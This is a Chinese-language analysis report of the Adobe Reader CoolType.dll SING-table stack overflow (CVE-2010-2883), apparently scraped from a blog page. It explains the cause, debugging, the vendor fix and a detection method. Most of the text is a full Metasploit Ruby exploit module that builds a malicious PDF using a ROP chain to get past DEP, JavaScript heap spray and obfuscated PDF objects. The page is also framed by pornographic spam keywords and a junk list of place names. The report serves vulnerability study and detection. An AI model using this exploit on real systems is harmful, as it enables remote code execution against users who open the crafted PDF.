最美情侣中文字幕电影,在线麻豆精品传媒,在线网站高清黄,久久黄色视频

歡迎光臨散文網(wǎng) 會員登陸 & 注冊

Adobe Reader 緩沖區(qū)溢出漏洞 (CVE-2010-2883)漏洞分析報告

2022-01-20 14:01 作者:rkvir逆向工程學院  | 我要投稿


一.?簡介

軟件名稱:Adobe Reader

影響范圍:7.0.0-9.3.4版本

影響平臺:Windows

漏洞模塊:CoolType.dll

威脅等級:高危

漏洞類型:緩沖區(qū)溢出

威脅路徑:遠程

機密性影響:完全的信息泄露導致所有系統(tǒng)文件暴露

完整性影響:系統(tǒng)完整性可被完全破壞

可用性影響:可能導致系統(tǒng)完全宕機

攻擊復雜度:漏洞利用存在一定的訪問條件

攻擊向量:攻擊者不需要獲取內網(wǎng)訪問權或本地訪問權

身份認證:漏洞利用無需身份認證

二.?軟件介紹

Adobe Reader(也被稱為Acrobat Reader)是美國Adobe公司開發(fā)的一款優(yōu)秀的PDF文件閱讀軟件。文檔的撰寫者可以向任何人分發(fā)自己制作(通過Adobe Acrobat制作)的PDF文檔而不用擔心被惡意篡改。

三.?漏洞成因

Adobe Reader的CollType.dll中存在基于棧的緩沖區(qū)溢出漏洞,遠程攻擊者可借助帶有TTF字體Smart INdependent Glyphlets (SING)表格中超長字段的PDF文件執(zhí)行任意代碼或者導致拒絕服務。

具體成因為Adobe Reader在調用strcat時,沒有判斷uniqueName字段的字符串長度,直接復制到固定大小的棧空間中,導致溢出。

使用IDA pro直接在CoolType.dll尋找SING表,即可直接觀察其溢出漏洞的位置:



四.?漏洞分析

4.1格式分析

4.1.1 TableEntry結構在官方文檔中的定義如下:


Typedef?struct_SING
{
Char?tag[4];???//SING字符串
ULONG?checkSum;????//校驗和
ULONG?offset;??//相對文件偏移
ULONG?length;??//數(shù)據(jù)長度
}


4.1.2 在該樣本中,SING表的形態(tài)


Char?tag[4];????//53?49?4E?47
ULONG?checkSum;?//D9?BC?C8?B5
ULONG?offset;??//00?00?01?1C
ULONG?length;??//00?00?1D?DF


根據(jù)上圖可以看出,在TableEntry結構入口處偏移0x11c,就是SING表的真實數(shù)據(jù),其長度為0x1DDF。然后再偏移0x10就是uniqueName域了。

4.1.3 uniqueName域

在執(zhí)行strcat函數(shù)后,會將SING表的內容部分拷貝至ebp的地址,直到遇到NULL,在我調試時,該地址為0x0012e454,但是該地址并不固定。根據(jù)下圖,可以看出在exp觸發(fā)后ebp的地址內所存儲的,正是SING表的真實數(shù)據(jù)。

4.2 漏洞調試

4.2.1利用IDA pro查看溢出函數(shù)的位置


4.2.2打開Immunity Debugger附加程序,并且運行至程序領空,轉至溢出函數(shù)的位置,按下F2設置斷點。再用Adobe Reader打開poc.pdf,那么就可以看到程序觸發(fā)異常停止在了我設置斷點的位置上了。

4.2.3可以看出在執(zhí)行完strcat之后,SING表uniqueName域的數(shù)據(jù)就已經(jīng)拷貝到了棧中。

4.2.4 總結一下,如果是xp系統(tǒng),那么在SING表的uniqueName域內構造shellcode,就可以在觸發(fā)漏洞后直接執(zhí)行代碼,如果是win7以后的windows版本,則需要rop技術,繞過相關保護.因為PDF支持JavaScript的緣故,故此,我們可以使用heap spray技術,精準的對溢出進行利用。

五.?廠商修復手段

添加了字符串長度的檢測和限制,自己模擬了一個安全strcat函數(shù)替代原有的strcat函數(shù),該函數(shù)限制字符串長度需要小于260個字符,同時根據(jù)字符串長度進行動態(tài)內存分配。

六.?檢測方法

分析文件格式,在Object中定位到SING表后,根據(jù)官方文檔提供的格式對其進行解析,判斷字符串長度,如果長于官方預定的260字節(jié),則可懷疑其在利用CVE-2010-2883進行溢出。

七.?Exploit

使用的exploit由Exploit-db下載,使用ruby編寫。

##
#?$Id:?adobe_cooltype_sing.rb?10477?2010-09-25?11:59:02Z?mc?$
##
?
##
#?This?file?is?part?of?the?Metasploit?Framework?and?may?be?subject?to
#?redistribution?and?commercial?restrictions.?Please?see?the?Metasploit
#?Framework?web?site?for?more?information?on?licensing?and?terms?of?use.
#?http://metasploit.com/framework/
##
?
require?'msf/core'
require?'zlib'
?
class?Metasploit3?<?Msf::Exploit::Remote
????Rank?=?GreatRanking?#?aslr+dep?bypass,?js?heap?spray,?rop,?stack?bof
?
????include?Msf::Exploit::FILEFORMAT
?
????def?initialize(info?=?{})
????????super(update_info(info,
????????????'Name'???????????=>?'Adobe?CoolType?SING?Table?"uniqueName"?Stack?Buffer?Overflow',
????????????'Description'????=>?%q{
????????????????????This?module?exploits?a?vulnerability?in?the?Smart?INdependent?Glyplets?(SING)?table
????????????????handling?within?versions?8.2.4?and?9.3.4?of?Adobe?Reader.?Prior?version?are
????????????????assumed?to?be?vulnerable?as?well.
????????????},
????????????'License'????????=>?MSF_LICENSE,
????????????'Author'?????????=>
????????????????[
????????????????????'Unknown',????#?0day?found?in?the?wild
????????????????????'@sn0wfl0w',??#?initial?analysis
????????????????????'@vicheck',???#?initial?analysis
????????????????????'jduck'???????#?Metasploit?module
????????????????],
????????????'Version'????????=>?'$Revision:?10477?$',
????????????'References'?????=>
????????????????[
????????????????????[?'CVE',?'2010-2883'?],
????????????????????[?'OSVDB',?'67849'],
????????????????????[?'URL',?'http://contagiodump.blogspot.com/2010/09/cve-david-leadbetters-one-point-lesson.html'?],
????????????????????[?'URL',?'http://www.adobe.com/support/security/advisories/apsa10-02.html'?]
????????????????],
????????????'DefaultOptions'?=>
????????????????{
????????????????????'EXITFUNC'?????????????=>?'process',
????????????????????'InitialAutoRunScript'?=>?'migrate?-f',
????????????????????'DisablePayloadHandler'?=>?'true',
????????????????},
????????????'Payload'????????=>
????????????????{
????????????????????'Space'????=>?1000,
????????????????????'BadChars'?=>?"\x00",
????????????????????'DisableNops'?=>?true
????????????????},
????????????'Platform'???????=>?'win',
????????????'Targets'????????=>
????????????????[
????????????????????#?Tested?OK?via?Adobe?Reader?9.3.4?on?Windows?XP?SP3?-jjd
????????????????????#?Tested?OK?via?Adobe?Reader?9.3.4?on?Windows?7?-jjd
????????????????????[?'Automatic',?{?}],
????????????????],
????????????'DisclosureDate'?=>?'Sep?07?2010',
????????????'DefaultTarget'??=>?0))
?
????????register_options(
????????????[
????????????????OptString.new('FILENAME',?[?true,?'The?file?name.',??'msf.pdf']),
????????????],?self.class)
????end
?
????def?exploit
????????ttf_data?=?make_ttf()
?
????????js_data?=?make_js(payload.encoded)
?
????????#?Create?the?pdf
????????pdf?=?make_pdf(ttf_data,?js_data)
?
????????print_status("Creating?'#{datastore['FILENAME']}'?file...")
?
????????file_create(pdf)
????end
?
????def?make_ttf
????????ttf_data?=?""
?
????????#?load?the?static?ttf?file
?
????????#?NOTE:?The?0day?used?Vera.ttf?(785d2fd45984c6548763ae6702d83e20)
????????path?=?File.join(?Msf::Config.install_root,?"data",?"exploits",?"cve-2010-2883.ttf"?)
????????fd?=?File.open(?path,?"rb"?)
????????ttf_data?=?fd.read(fd.stat.size)
????????fd.close
?
????????#?Build?the?SING?table
????????sing?=?''
????????sing?<<?[
????????????0,?1,???#?tableVersionMajor,?tableVersionMinor?(0.1)
????????????0xe01,??#?glyphletVersion
????????????0x100,??#?embeddingInfo
????????????0,??????#?mainGID
????????????0,??????#?unitsPerEm
????????????0,??????#?vertAdvance
????????????0x3a00??#?vertOrigin
????????].pack('vvvvvvvv')
????????#?uniqueName
????????#?"The?uniqueName?string?must?be?a?string?of?at?most?27?7-bit?ASCII?characters"
????????#sing?<<?"A"?*?(0x254?-?sing.length)
????????sing?<<?rand_text(0x254?-?sing.length)
?
????????#?0xffffffff?gets?written?here?@?0x7001400?(in?BIB.dll)
????????sing[0x140,?4]?=?[0x4a8a08e2?-?0x1c].pack('V')
?
????????#?This?becomes?our?new?EIP?(puts?esp?to?stack?buffer)
????????ret?=?0x4a80cb38?#?add?ebp,?0x794?/?leave?/?ret
????????sing[0x208,?4]?=?[ret].pack('V')
?
????????#?This?becomes?the?new?eip?after?the?first?return
????????ret?=?0x4a82a714
????????sing[0x18,?4]?=?[ret].pack('V')
?
????????#?This?becomes?the?new?esp?after?the?first?return
????????esp?=?0x0c0c0c0c
????????sing[0x1c,?4]?=?[esp].pack('V')
?
????????#?Without?the?following,?sub_801ba57?returns?0.
????????sing[0x24c,?4]?=?[0x6c].pack('V')
?
????????ttf_data[0xec,?4]?=?"SING"
????????ttf_data[0x11c,?sing.length]?=?sing
?
????????ttf_data
????end
?
????def?make_js(encoded_payload)
?
????????#?The?following?executes?a?ret2lib?using?icucnv36.dll
????????#?The?effect?is?to?bypass?DEP?and?execute?the?shellcode?in?an?indirect?way
????????stack_data?=?[
????????????0x41414141,???#?unused
????????????0x4a8063a5,???#?pop?ecx?/?ret
????????????0x4a8a0000,???#?becomes?ecx
?
????????????0x4a802196,???#?mov?[ecx],eax?/?ret?#?save?whatever?eax?starts?as
?
????????????0x4a801f90,???#?pop?eax?/?ret
????????????0x4a84903c,???#?becomes?eax?(import?for?CreateFileA)
?
????????????#?--?call?CreateFileA
????????????0x4a80b692,???#?jmp?[eax]
?
????????????0x4a801064,???#?ret
?
????????????0x4a8522c8,???#?first?arg?to?CreateFileA?(lpFileName?/?pointer?to?"iso88591")
????????????0x10000000,???#?second?arg??-?dwDesiredAccess
????????????0x00000000,???#?third?arg???-?dwShareMode
????????????0x00000000,???#?fourth?arg??-?lpSecurityAttributes
????????????0x00000002,???#?fifth?arg???-?dwCreationDisposition
????????????0x00000102,???#?sixth?arg???-?dwFlagsAndAttributes
????????????0x00000000,???#?seventh?arg?-?hTemplateFile
?
????????????0x4a8063a5,???#?pop?ecx?/?ret
????????????0x4a801064,???#?becomes?ecx
?
????????????0x4a842db2,???#?xchg?eax,edi?/?ret
?
????????????0x4a802ab1,???#?pop?ebx?/?ret
????????????0x00000008,???#?becomes?ebx?-?offset?to?modify
?
????????????#
????????????#?This?points?at?a?neat-o?block?of?code?that?...?TBD
????????????#
????????????#???and?[esp+ebx*2],edi
????????????#???jne?check_slash
????????????#?ret_one:
????????????#???mov?al,1
????????????#???ret
????????????#?check_slash:
????????????#???cmp?al,0x2f
????????????#???je?ret_one
????????????#???cmp?al,0x41
????????????#???jl?check_lower
????????????#???cmp?al,0x5a
????????????#???jle?check_ptr
????????????#?check_lower:
????????????#???cmp?al,0x61
????????????#???jl?ret_zero
????????????#???cmp?al,0x7a
????????????#???jg?ret_zero
????????????#???cmp?[ecx+1],0x3a
????????????#???je?ret_one
????????????#?ret_zero:
????????????#???xor?al,al
????????????#???ret
????????????#
?
????????????0x4a80a8a6,???#?execute?fun?block
?
????????????0x4a801f90,???#?pop?eax?/?ret
????????????0x4a849038,???#?becomes?eax?(import?for?CreateFileMappingA)
?
????????????#?--?call?CreateFileMappingA
????????????0x4a80b692,???#?jmp?[eax]
?
????????????0x4a801064,???#?ret
?
????????????0xffffffff,???#?arguments?to?CreateFileMappingA,?hFile
????????????0x00000000,???#?lpAttributes
????????????0x00000040,???#?flProtect
????????????0x00000000,???#?dwMaximumSizeHigh
????????????0x00010000,???#?dwMaximumSizeLow
????????????0x00000000,???#?lpName
?
????????????0x4a8063a5,???#?pop?ecx?/?ret
????????????0x4a801064,???#?becomes?ecx
?
????????????0x4a842db2,???#?xchg?eax,edi?/?ret
?
????????????0x4a802ab1,???#?pop?ebx?/?ret
????????????0x00000008,???#?becomes?ebx?-?offset?to?modify
?
????????????0x4a80a8a6,???#?execute?fun?block
?
????????????0x4a801f90,???#?pop?eax?/?ret
????????????0x4a849030,???#?becomes?eax?(import?for?MapViewOfFile
?
????????????#?--?call?MapViewOfFile
????????????0x4a80b692,???#?jmp?[eax]
?
????????????0x4a801064,???#?ret
?
????????????0xffffffff,???#?args?to?MapViewOfFile?-?hFileMappingObject
????????????0x00000022,???#?dwDesiredAccess
????????????0x00000000,???#?dwFileOffsetHigh
????????????0x00000000,???#?dwFileOffsetLow
????????????0x00010000,???#?dwNumberOfBytesToMap
?
????????????0x4a8063a5,???#?pop?ecx?/?ret
????????????0x4a8a0004,???#?becomes?ecx?-?writable?pointer
?
????????????0x4a802196,???#?mov?[ecx],eax?/?ret?-?save?map?base?addr
?
????????????0x4a8063a5,???#?pop?ecx?/?ret
????????????0x4a801064,???#?becomes?ecx?-?ptr?to?ret
?
????????????0x4a842db2,???#?xchg?eax,edi?/?ret
?
????????????0x4a802ab1,???#?pop?ebx?/?ret
????????????0x00000030,???#?becomes?ebx?-?offset?to?modify
?
????????????0x4a80a8a6,???#?execute?fun?block
?
????????????0x4a801f90,???#?pop?eax?/?ret
????????????0x4a8a0004,???#?becomes?eax?-?saved?file?mapping?ptr
?
????????????0x4a80a7d8,???#?mov?eax,[eax]?/?ret?-?load?saved?mapping?ptr
?
????????????0x4a8063a5,???#?pop?ecx?/?ret
????????????0x4a801064,???#?becomes?ecx?-?ptr?to?ret
?
????????????0x4a842db2,???#?xchg?eax,edi?/?ret
?
????????????0x4a802ab1,???#?pop?ebx?/?ret
????????????0x00000020,???#?becomes?ebx?-?offset?to?modify
?
????????????0x4a80a8a6,???#?execute?fun?block
?
????????????0x4a8063a5,???#?pop?ecx?/?ret
????????????0x4a801064,???#?becomes?ecx?-?ptr?to?ret
?
????????????0x4a80aedc,???#?lea?edx,[esp+0xc]?/?push?edx?/?push?eax?/?push?[esp+0xc]?/?push?[0x4a8a093c]?/?call?ecx?/?add?esp,?0x10?/?ret
?
????????????0x4a801f90,???#?pop?eax?/?ret
????????????0x00000034,???#?becomes?eax
?
????????????0x4a80d585,???#?add?eax,edx?/?ret
?
????????????0x4a8063a5,???#?pop?ecx?/?ret
????????????0x4a801064,???#?becomes?ecx?-?ptr?to?ret
?
????????????0x4a842db2,???#?xchg?eax,edi?/?ret
?
????????????0x4a802ab1,???#?pop?ebx?/?ret
????????????0x0000000a,???#?becomes?ebx?-?offset?to?modify
?
????????????0x4a80a8a6,???#?execute?fun?block
?
????????????0x4a801f90,???#?pop?eax?/?ret
????????????0x4a849170,???#?becomes?eax?(import?for?memcpy)
?
????????????#?--?call?memcpy
????????????0x4a80b692,???#?jmp?[eax]
?
????????????0xffffffff,???#?this?stuff?gets?overwritten?by?the?block?at?0x4a80aedc,?becomes?ret?from?memcpy
????????????0xffffffff,???#?becomes?first?arg?to?memcpy?(dst)
????????????0xffffffff,???#?becomes?second?arg?to?memcpy?(src)
????????????0x00001000,???#?becomes?third?arg?to?memcpy?(length)
????????????#0x0000258b,???#???
????????????#0x4d4d4a8a,???#???
????????].pack('V*')
?
????????var_unescape??=?rand_text_alpha(rand(100)?+?1)
????????var_shellcode?=?rand_text_alpha(rand(100)?+?1)
?
????????var_start?????=?rand_text_alpha(rand(100)?+?1)
?
????????var_s?????????=?0x10000
????????var_c?????????=?rand_text_alpha(rand(100)?+?1)
????????var_b?????????=?rand_text_alpha(rand(100)?+?1)
????????var_d?????????=?rand_text_alpha(rand(100)?+?1)
????????var_3?????????=?rand_text_alpha(rand(100)?+?1)
????????var_i?????????=?rand_text_alpha(rand(100)?+?1)
????????var_4?????????=?rand_text_alpha(rand(100)?+?1)
?
????????payload_buf?=?''
????????payload_buf?<<?stack_data
????????payload_buf?<<?encoded_payload
?
????????escaped_payload?=?Rex::Text.to_unescape(payload_buf)
?
????????js?=?%Q|
var?#{var_unescape}?=?unescape;
var?#{var_shellcode}?=?#{var_unescape}(?'#{escaped_payload}'?);
var?#{var_c}?=?#{var_unescape}(?"%"?+?"u"?+?"0"?+?"c"?+?"0"?+?"c"?+?"%u"?+?"0"?+?"c"?+?"0"?+?"c"?);
while?(#{var_c}.length?+?20?+?8?<?#{var_s})?#{var_c}+=#{var_c};
#{var_b}?=?#{var_c}.substring(0,?(0x0c0c-0x24)/2);
#{var_b}?+=?#{var_shellcode};
#{var_b}?+=?#{var_c};
#{var_d}?=?#{var_b}.substring(0,?#{var_s}/2);
while(#{var_d}.length?<?0x80000)?#{var_d}?+=?#{var_d};
#{var_3}?=?#{var_d}.substring(0,?0x80000?-?(0x1020-0x08)?/?2);
var?#{var_4}?=?new?Array();
for?(#{var_i}=0;#{var_i}<0x1f0;#{var_i}++)?#{var_4}[#{var_i}]=#{var_3}+"s";
|
?
????????js
????end
?
????def?RandomNonASCIIString(count)
????????result?=?""
????????count.times?do
????????????result?<<?(rand(128)?+?128).chr
????????end
????????result
????end
?
????def?ioDef(id)
????????"%d?0?obj?\n"?%?id
????end
?
????def?ioRef(id)
????????"%d?0?R"?%?id
????end
??
????#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/
????def?nObfu(str)
????????#return?str
????????result?=?""
????????str.scan(/./u)?do?|c|
????????????if?rand(2)?==?0?and?c.upcase?>=?'A'?and?c.upcase?<=?'Z'
????????????????result?<<?"#%x"?%?c.unpack("C*")[0]
????????????else
????????????????result?<<?c
????????????end
????????end
????????result
????end
??
????def?ASCIIHexWhitespaceEncode(str)
????????result?=?""
????????whitespace?=?""
????????str.each_byte?do?|b|
????????????result?<<?whitespace?<<?"%02x"?%?b
????????????whitespace?=?"?"?*?(rand(3)?+?1)
????????end
????????result?<<?">"
????end
??
????def?make_pdf(ttf,?js)
?
????????#swf_name?=?rand_text_alpha(8?+?rand(8))?+?".swf"
?
????????xref?=?[]
????????eol?=?"\n"
????????endobj?=?"endobj"?<<?eol
?
????????#?Randomize?PDF?version?
????????pdf?=?"%PDF-1.5"?<<?eol
????????pdf?<<?"%"?<<?RandomNonASCIIString(4)?<<?eol
?
????????#?catalog
????????xref?<<?pdf.length
????????pdf?<<?ioDef(1)?<<?nObfu("<<")?<<?eol
????????pdf?<<?nObfu("/Pages?")?<<?ioRef(2)?<<?eol
????????pdf?<<?nObfu("/Type?/Catalog")?<<?eol
????????pdf?<<?nObfu("/OpenAction?")?<<?ioRef(11)?<<?eol
????????#?The?AcroForm?is?required?to?get?icucnv36.dll?to?load
????????pdf?<<?nObfu("/AcroForm?")?<<?ioRef(13)?<<?eol
????????pdf?<<?nObfu(">>")?<<?eol
????????pdf?<<?endobj
?
????????#?pages?array
????????xref?<<?pdf.length
????????pdf?<<?ioDef(2)?<<?nObfu("<<")?<<?eol
????????pdf?<<?nObfu("/MediaBox?")?<<?ioRef(3)?<<?eol
????????pdf?<<?nObfu("/Resources?")?<<?ioRef(4)?<<?eol
????????pdf?<<?nObfu("/Kids?[")?<<?ioRef(5)?<<?"]"?<<?eol
????????pdf?<<?nObfu("/Count?1")?<<?eol
????????pdf?<<?nObfu("/Type?/Pages")?<<?eol
????????pdf?<<?nObfu(">>")?<<?eol
????????pdf?<<?endobj
?
????????#?media?box
????????xref?<<?pdf.length
????????pdf?<<?ioDef(3)
????????pdf?<<?"[0?0?595?842]"?<<?eol
????????pdf?<<?endobj
?
????????#?resources
????????xref?<<?pdf.length
????????pdf?<<?ioDef(4)
????????pdf?<<?nObfu("<<")?<<?eol
????????pdf?<<?nObfu("/Font?")?<<?ioRef(6)?<<?eol
????????pdf?<<?">>"?<<?eol
????????pdf?<<?endobj
?
????????#?page?1
????????xref?<<?pdf.length
????????pdf?<<?ioDef(5)?<<?nObfu("<<")?<<?eol
????????pdf?<<?nObfu("/Parent?")?<<?ioRef(2)?<<?eol
????????pdf?<<?nObfu("/MediaBox?")?<<?ioRef(3)?<<?eol
????????pdf?<<?nObfu("/Resources?")?<<?ioRef(4)?<<?eol
????????pdf?<<?nObfu("/Contents?[")?<<?ioRef(8)?<<?nObfu("]")?<<?eol
????????pdf?<<?nObfu("/Type?/Page")?<<?eol
????????pdf?<<?nObfu(">>")?<<?eol?#?end?obj?dict
????????pdf?<<?endobj
?
????????#?font
????????xref?<<?pdf.length
????????pdf?<<?ioDef(6)?<<?nObfu("<<")?<<?eol
????????pdf?<<?nObfu("/F1?")?<<?ioRef(7)?<<?eol
????????pdf?<<?">>"?<<?eol
????????pdf?<<?endobj
?
????????#?ttf?object
????????xref?<<?pdf.length
????????pdf?<<?ioDef(7)?<<?nObfu("<<")?<<?eol
????????pdf?<<?nObfu("/Type?/Font")?<<?eol
????????pdf?<<?nObfu("/Subtype?/TrueType")?<<?eol
????????pdf?<<?nObfu("/Name?/F1")?<<?eol
????????pdf?<<?nObfu("/BaseFont?/Cinema")?<<?eol
????????pdf?<<?nObfu("/Widths?[]")?<<?eol
????????pdf?<<?nObfu("/FontDescriptor?")?<<?ioRef(9)
????????pdf?<<?nObfu("/Encoding?/MacRomanEncoding")
????????pdf?<<?nObfu(">>")?<<?eol
????????pdf?<<?endobj
?
????????#?page?content
????????content?=?"Hello?World!"
????????content?=?""?+
????????????"0?g"?+?eol?+
????????????"BT"?+?eol?+
????????????"/F1?32?Tf"?+?eol?+
????????????"32?Tc"?+?eol?+
????????????"1?0?0?1?32?773.872?Tm"?+?eol?+
????????????"("?+?content?+?")?Tj"?+?eol?+
????????????"ET"
?
????????xref?<<?pdf.length
????????pdf?<<?ioDef(8)?<<?"<<"?<<?eol
????????pdf?<<?nObfu("/Length?%s"?%?content.length)?<<?eol
????????pdf?<<?">>"?<<?eol
????????pdf?<<?"stream"?<<?eol
????????pdf?<<?content?<<?eol
????????pdf?<<?"endstream"?<<?eol
????????pdf?<<?endobj
?
????????#?font?descriptor
????????xref?<<?pdf.length
????????pdf?<<?ioDef(9)?<<?nObfu("<<")
????????pdf?<<?nObfu("/Type/FontDescriptor/FontName/Cinema")
????????pdf?<<?nObfu("/Flags?%d"?%?(2**2?+?2**6?+?2**17))
????????pdf?<<?nObfu("/FontBBox?[-177?-269?1123?866]")
????????pdf?<<?nObfu("/FontFile2?")?<<?ioRef(10)
????????pdf?<<?nObfu(">>")?<<?eol
????????pdf?<<?endobj
?
????????#?ttf?stream
????????xref?<<?pdf.length
????????compressed?=?Zlib::Deflate.deflate(ttf)
????????pdf?<<?ioDef(10)?<<?nObfu("<</Length?%s/Filter/FlateDecode/Length1?%s>>"?%?[compressed.length,?ttf.length])?<<?eol
????????pdf?<<?"stream"?<<?eol
????????pdf?<<?compressed?<<?eol
????????pdf?<<?"endstream"?<<?eol
????????pdf?<<?endobj
?
????????#?js?action
????????xref?<<?pdf.length
????????pdf?<<?ioDef(11)?<<?nObfu("<<")
????????pdf?<<?nObfu("/Type/Action/S/JavaScript/JS?")?+?ioRef(12)
????????pdf?<<?nObfu(">>")?<<?eol
????????pdf?<<?endobj
?
????????#?js?stream
????????xref?<<?pdf.length
????????compressed?=?Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js))
????????pdf?<<?ioDef(12)?<<?nObfu("<</Length?%s/Filter[/FlateDecode/ASCIIHexDecode]>>"?%?compressed.length)?<<?eol
????????pdf?<<?"stream"?<<?eol
????????pdf?<<?compressed?<<?eol
????????pdf?<<?"endstream"?<<?eol
????????pdf?<<?endobj
?
????????###
????????#?The?following?form?related?data?is?required?to?get?icucnv36.dll?to?load
????????###
?
????????#?form?object
????????xref?<<?pdf.length
????????pdf?<<?ioDef(13)
????????pdf?<<?nObfu("<</XFA?")?<<?ioRef(14)?<<?nObfu(">>")?<<?eol
????????pdf?<<?endobj
?
????????#?form?stream
????????xfa?=?<<-EOF
<?xml?version="1.0"?encoding="UTF-8"?>
<xdp:xdp?xmlns:xdp="http://ns.adobe.com/xdp/">
<config?xmlns="http://www.xfa.org/schema/xci/2.6/">
<present><pdf><interactive>1</interactive></pdf></present>
</config>
<template?xmlns="http://www.xfa.org/schema/xfa-template/2.6/">
<subform?name="form1"?layout="tb"?locale="en_US">
<pageSet></pageSet>
</subform></template></xdp:xdp>
EOF
?
????????xref?<<?pdf.length
????????pdf?<<?ioDef(14)?<<?nObfu("<</Length?%s>>"?%?xfa.length)?<<?eol
????????pdf?<<?"stream"?<<?eol
????????pdf?<<?xfa?<<?eol
????????pdf?<<?"endstream"?<<?eol
????????pdf?<<?endobj
?
????????###
????????#?end?form?stuff?for?icucnv36.dll
????????###
??
????????#?trailing?stuff
????????xrefPosition?=?pdf.length
????????pdf?<<?"xref"?<<?eol
????????pdf?<<?"0?%d"?%?(xref.length?+?1)?<<?eol
????????pdf?<<?"0000000000?65535?f"?<<?eol
????????xref.each?do?|index|
????????????pdf?<<?"%010d?00000?n"?%?index?<<?eol
????????end
?
????????pdf?<<?"trailer"?<<?eol
????????pdf?<<?nObfu("<</Size?%d/Root?"?%?(xref.length?+?1))?<<?ioRef(1)?<<?">>"?<<?eol
?
????????pdf?<<?"startxref"?<<?eol
????????pdf?<<?xrefPosition.to_s()?<<?eol
?
????????pdf?<<?"%%EOF"?<<?eol
????????pdf
????end
?
end
標簽:

Adobe Reader 緩沖區(qū)溢出漏洞 (CVE-2010-2883)漏洞分析報告的評論 (共 條)

分享到微博請遵守國家法律
乌拉特后旗| 左权县| 玉环县| 五常市| 南靖县| 新乡市| 台湾省| 清水河县| 泗洪县| 长兴县| 青田县| 黄山市| 阿勒泰市| 奎屯市| 日土县| 班戈县| 元谋县| 合江县| 阆中市| 南乐县| 海门市| 门头沟区| 兴山县| 边坝县| 苗栗市| 通渭县| 汶川县| 灵台县| 金塔县| 沧源| 巨鹿县| 大荔县| 莒南县| 岳阳县| 侯马市| 蓬溪县| 呼和浩特市| 稻城县| 土默特左旗| 万盛区| 阳西县|